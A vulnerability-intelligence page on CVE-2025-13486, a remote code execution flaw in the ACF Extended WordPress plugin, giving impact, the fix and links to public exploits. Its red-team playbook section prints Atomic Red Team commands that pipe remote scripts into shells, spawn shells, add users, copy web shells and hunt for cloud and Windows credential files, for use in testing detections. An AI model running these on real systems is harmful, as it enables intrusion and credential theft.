CVE-2025-13486
Overview
This vulnerability is a remote code execution flaw stemming from unsafe use of PHP's call_user_func_array() within the prepare_form() function of the Advanced Custom Fields: Extended WordPress plugin. The function accepts user-supplied input without proper validation or sanitization, enabling execution of arbitrary PHP code. The affected component is the form preparation mechanism in versions 0.9.0.5 through 0.9.1.1 of the plugin.
Vulnerability Description
The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to Remote Code Execution in versions 0.9.0.5 through 0.9.1.1 via the prepare_form() function. This is due to the function accepting user input and then passing that through call_user_func_array(). This makes it possible for unauthenticated attackers to execute arbitrary code on the server, which can be leveraged to inject backdoors or create new administrative user accounts.
Impact
An unauthenticated attacker can exploit this flaw remotely to execute arbitrary code on the server hosting the vulnerable WordPress plugin. This capability allows injection of persistent backdoors, creation of new administrative users, or full system compromise. The vulnerability requires no user interaction and no privileges, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N), enabling widespread exploitation potential. Successful exploitation could lead to data breaches, service disruption, and complete loss of site integrity.
Solution
To remediate this vulnerability, upgrade the Advanced Custom Fields: Extended plugin to a version later than 0.9.1.1 where the prepare_form() function no longer passes unsanitized user input to call_user_func_array(). Detailed patch information and version updates are documented in the WordPress plugin repository changeset 3400134 and the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/c508cb73-53e6-4ebe-b3d0-285908b722c9. Applying this update is the recommended mitigation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Advanced Custom Fields: Extended plugin for WordPress stems from improper handling of user input within the prepare_form() function. This function allows for the execution of arbitrary code due to its reliance on call_user_func_array(), which can be manipulated by an attacker. When user input is not adequately sanitized or validated, it opens the door for remote code execution (RCE). This flaw is particularly critical because it allows unauthenticated users to execute code on the server, potentially leading to severe consequences such as the installation of backdoors or the creation of unauthorized administrative accounts.
Attack vectors for this vulnerability are varied and can be executed with relative ease by individuals with malicious intent. An attacker could exploit this flaw by crafting a specially designed request that includes malicious payloads targeting the vulnerable function. Once the payload is executed, the attacker gains control over the server, allowing them to perform a range of activities, from data exfiltration to complete system compromise. The ability to execute arbitrary code without authentication significantly lowers the barrier for exploitation, making it a prime target for attackers seeking to compromise WordPress installations.
The real-world impact of this vulnerability is substantial, particularly for businesses relying on WordPress for their online presence. Successful exploitation can lead to unauthorized access to sensitive data, loss of customer trust, and potential legal ramifications due to data breaches. The business risk escalates further when considering the potential for attackers to deploy ransomware or other malicious software, which can disrupt operations and lead to significant financial losses. Additionally, the presence of backdoors can facilitate ongoing access for attackers, making remediation efforts more complex and costly.
To detect and mitigate this vulnerability, organizations should adopt a multi-layered security approach. Regularly updating plugins and themes to their latest versions is crucial, as developers often release patches to address known vulnerabilities. Implementing a web application firewall (WAF) can also help filter out malicious requests before they reach the server. Furthermore, conducting routine security audits and employing intrusion detection systems can assist in identifying unusual activities indicative of exploitation attempts. Educating users and administrators about secure coding practices and the importance of input validation can further reduce the risk of similar vulnerabilities in the future.
In conclusion, the vulnerability within the Advanced Custom Fields: Extended plugin poses a significant threat to WordPress installations, particularly due to its potential for remote code execution by unauthenticated attackers. The implications for businesses are severe, encompassing data breaches, financial losses, and reputational damage. Effective detection and mitigation strategies are essential to safeguard against such vulnerabilities, ensuring that organizations can maintain the integrity and security of their web applications in an increasingly hostile cyber landscape.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
WordPress ACF Extended Unauthenticated RCE via prepare_form()
exploits/multi/http/wp_acf_extended_rce
|
Marcin Dudek (dudekmar) - CERT.PL, Valentin Lobstein <[email protected]> | Unknown | - | View |
GitHub PoCs (7)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
0xanis/CVE-2025-13486-POC
POC for CVE-2025-13486
|
0xanis | 5 | 0 | 2025-12-04 | View |
|
MataKucing-OFC/CVE-2025-13486
The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to Remote Code Execution in versions 0.9.0.5 thr...
|
MataKucing-OFC | 2 | 1 | 2025-12-05 | View |
|
whattheslime/CVE-2025-13486
CVE-2025-13486 - Remote Code Execution & Privilege Escalation exploit
|
whattheslime | 1 | 1 | 2025-12-19 | View |
|
whattheslime/CVE-2025-13486-exploit
CVE-2025-13486 - Remote Code Execution & Privilege Escalation exploit
|
whattheslime | 1 | 1 | 2025-12-19 | View |
|
0xgh057r3c0n/CVE-2025-13486
Advanced Custom Fields Extended (ACFE) WordPress Plugin Exploit RCE - Admin Creation
|
0xgh057r3c0n | 1 | 1 | 2025-12-06 | View |
|
KrE80r/cve-2025-13486-vuln-setup
Docker test environment for CVE-2025-13486 (ACF Extended RCE). For security research only.
|
KrE80r | 0 | 1 | 2025-12-04 | View |
|
0xnemian/CVE-2025-13486.-CVE-2025-13486
Vulnerable setup for CVE-2025-13486 - Advanced Custom Fields: Extended - Remote Code Execution
|
0xnemian | 0 | 0 | 2025-12-04 | View |
Threat Feed
2 eventsProof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-13486 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/c508cb73-53e6-4ebe-b3d0-285908b722c9?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3400134/acf-extended |